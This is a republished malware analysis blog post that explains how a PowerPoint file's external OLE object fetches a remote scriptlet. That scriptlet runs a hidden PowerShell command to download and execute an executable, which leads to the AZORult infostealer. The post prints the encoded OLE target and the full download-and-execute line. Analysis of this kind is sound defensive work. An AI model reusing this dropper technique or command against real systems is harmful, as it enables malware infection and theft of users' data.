Marco Ramilli, founder and CEO at cyber firm Yoroi has explained how to use Microsoft Powerpoint as Dropper

Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it’s not so common (at least on my personal experiences), so I decided to write a little bit about it.

The “attack-path” is very close to what it’s observable on modern threats since years: eMail campaign with an attached document and actionable text on it. In the beginning, the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.

Analyzing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Microsoft Powerpoint dropper  - Microsoft Powerpoint dropper - How to use Microsoft Powerpoint as Malware DropperSecurity Affairs
Stage 1: Microsoft PowerPoint Dropping Website

An external OLEobject (compatibility 2006) was available on that value:

Target=”%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74″  

Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It’s showed as follows:

Microsoft Powerpoint dropper 2  - Microsoft Powerpoint dropper 2 - How to use Microsoft Powerpoint as Malware DropperSecurity Affairs
Stage 2: Executed Javascript

Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.

var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ ); 

The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later on VirusTotal.

Microsoft Powerpoint dropper 2  - Microsoft Powerpoint dropper 3 - How to use Microsoft Powerpoint as Malware DropperSecurity Affairs

Microsoft Powerpoint dropper 4  - Microsoft Powerpoint dropper 4 - How to use Microsoft Powerpoint as Malware DropperSecurity Affairs
Stage 3: .NET file

The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (HTTP POST) on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.

Microsoft Powerpoint dropper 5  - Microsoft Powerpoint dropper 5 - How to use Microsoft Powerpoint as Malware DropperSecurity Affairs
Microsoft Powerpoint dropper 6  - Microsoft Powerpoint dropper 6 - How to use Microsoft Powerpoint as Malware DropperSecurity Affairs

Stage4: AZORult evidence

I hope you had fun on this, I did! It was super interesting to see the attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still, this will not be a complete solution (on my personal point of view). A more and invasive action would be needed to check the remote content. Stay tuned!

Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.

About the author: Marco Ramilli, Founder of Yoroi

- ramilli - How to use Microsoft Powerpoint as Malware DropperSecurity AffairsI am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

- yoroi - How to use Microsoft Powerpoint as Malware DropperSecurity AffairsI do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans



Source link

No tags for this post.

LEAVE A REPLY

Please enter your comment!
Please enter your name here